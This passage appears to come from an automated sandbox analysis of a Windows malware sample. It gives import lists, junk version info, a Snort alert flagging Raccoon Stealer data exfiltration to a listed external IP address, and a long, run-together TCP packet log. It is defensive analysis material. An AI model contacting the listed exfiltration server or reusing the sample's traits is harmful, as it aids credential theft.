KERNEL32.dll  HeapReAlloc, GetLocaleInfoA, LoadResource, InterlockedIncrement, GetEnvironmentStringsW, AddConsoleAliasW, SetEvent, OpenSemaphoreA, GetSystemTimeAsFileTime, GetCommandLineA, WriteFileGather, CreateActCtxW, GetEnvironmentStrings, LeaveCriticalSection, GetFileAttributesA, ReadFile, GetDevicePowerState, GetProcAddress, FreeUserPhysicalPages, VerLanguageNameW, WriteConsoleA, GetProcessId, LocalAlloc, RemoveDirectoryW, GlobalGetAtomNameW, WaitForMultipleObjects, EnumResourceTypesW, GetModuleFileNameA, GetModuleHandleA, EraseTape, GetStringTypeW, ReleaseMutex, EndUpdateResourceA, LocalSize, FindFirstVolumeW, FindNextVolumeA, lstrcpyW, HeapAlloc, GetStartupInfoA, DeleteCriticalSection, EnterCriticalSection, HeapFree, VirtualFree, VirtualAlloc, HeapCreate, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, SetHandleCount, GetFileType, GetLastError, SetFilePointer, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, GetCurrentThreadId, InterlockedDecrement, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, InitializeCriticalSectionAndSpinCount, RtlUnwind, LoadLibraryA, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, CloseHandle, CreateFileA
USER32.dll    GetCursorPos

Exports

Name                 Ordinal  Address
@SetViceVariants@12  1        0x401000

Version Infos

Description     Data
InternalName    sajbmiamezu.ise
ProductVersion  8.64.59.5
Copyright       Copyrighz (C) 2021, fudkagat
Translation     0x0127 0x0081

Possible Origin

Language of compilation system  Country where language is spoken
English                         United States

Network Behavior

Snort IDS Alerts

Timestamp                 Protocol  SID      Message                                             Source Port  Dest Port  Source IP    Dest IP
09/27/21-20:31:47.146649  TCP       2033974  ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt  49755        80         192.168.2.5  194.180.174.100

Network Port Distribution

TCP Packets

Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                                                  Sep 27, 2021 20:31:44.134311914 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134335041 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134335995 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.134361982 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134383917 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134393930 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.134428978 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.134463072 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134489059 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134527922 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134547949 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.134567976 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134573936 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.134592056 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134613991 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134635925 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134637117 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.134680986 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.134807110 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134834051 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134855986 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134877920 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134877920 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.134898901 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134917974 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.134959936 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.134984970 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.135005951 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.135071039 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.135092974 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.135114908 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.135130882 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.135175943 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.135443926 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.135613918 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.135668993 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.135684013 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.135715961 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.135741949 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.135777950 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.135782957 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.135807037 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.135826111 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.135843992 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.135883093 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.135895014 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.135924101 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.135972023 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.135978937 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.136009932 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.136034012 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.136050940 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.136065006 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.136087894 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.136111021 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.136126041 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.136166096 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.136172056 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.136229992 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.136364937 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.136552095 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.136573076 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.136626005 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.185144901 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185200930 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185231924 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185250044 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185275078 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.185288906 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185311079 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185333014 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.185364962 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.185365915 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185388088 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185404062 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185422897 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185445070 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185480118 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.185547113 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185570955 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185595036 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.185623884 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185647964 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185673952 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.185687065 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185730934 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185750961 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185765982 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185775042 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.185791969 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185800076 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.185817957 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185841084 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.185882092 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185956001 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.185966969 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.185981035 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.186006069 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.186034918 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.186084986 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.186146975 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.186193943 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.186917067 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.186949015 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.186974049 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.187000036 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.187001944 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.187024117 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.187031031 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.187079906 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.187082052 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.187472105 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.187536001 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.187552929 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.187581062 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.187630892 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.187768936 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.187814951 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.187871933 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.187875986 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.187916994 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.187956095 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.187961102 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.187993050 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.188034058 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.188055992 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.188092947 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.188118935 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.188146114 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.188148022 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.188173056 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.188195944 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.188199997 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.188241005 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.236977100 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.237108946 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.237159014 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.237184048 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.237196922 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.237248898 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.237262964 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.237318039 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.237339020 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.237361908 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.237361908 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.237382889 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.237402916 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.237422943 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.237423897 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.237440109 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.237462997 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.237478971 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.237493992 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.237513065 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.237514019 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.237535000 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.237540007 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.237555981 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.237591028 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.237624884 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.237673044 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.238650084 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.238692045 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.238715887 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.238739967 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.238749027 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.238765001 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.292814016 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.292848110 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.292872906 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.292896032 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.292916059 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.292926073 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.292969942 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.292979956 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.293001890 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.293029070 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.293030024 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.293051958 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.293054104 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.293077946 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.293088913 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.293107033 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.293118954 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.293123960 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.293138027 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.293154955 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.293162107 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.293175936 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.293198109 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.293216944 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.293245077 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.293373108 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.340686083 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.340725899 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.340749025 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.340768099 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.340783119 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.340789080 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.340811014 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.340812922 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.340832949 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.340864897 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.340926886 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.341880083 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.341974974 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.342524052 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.342597008 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.343442917 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.343513966 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.343962908 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.344161034 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.344252110 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.344366074 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.344454050 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.344573021 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.344911098 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.391753912 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.391943932 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.391972065 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.391995907 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.392016888 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.392019033 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.392044067 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.392045021 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.392066956 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.392079115 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.392092943 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.392157078 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.392666101 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.392735958 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.392786980 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.392822027 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.392847061 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.392894030 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.392987013 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.393030882 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.393090963 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.393098116 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.393140078 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.393181086 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.393201113 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.393228054 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.393270016 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.393275023 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.393301964 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.393338919 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.393342972 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.393376112 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.393414021 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.393423080 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.393460035 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.393482924 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.393503904 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.393506050 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.393539906 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.393558025 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.393560886 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.393582106 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.393599033 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.393620014 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.393640041 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.393682957 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.393706083 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.393754959 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.393798113 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.393857956 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.393949986 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.393990040 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.394016981 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.394037008 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.394078970 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.394084930 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.394134045 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.394160032 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.394182920 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.394201994 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.394227982 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.394243956 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.394251108 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.394279003 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.394289970 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.394304991 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.394330025 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.394342899 CEST4975580192.168.2.5194.180.174.100
                                                                                                  Sep 27, 2021 20:31:44.394356012 CEST8049755194.180.174.100192.168.2.5
                                                                                                  Sep 27, 2021 20:31:44.394381046 CEST8049755194.180.174.100192.168.2.5
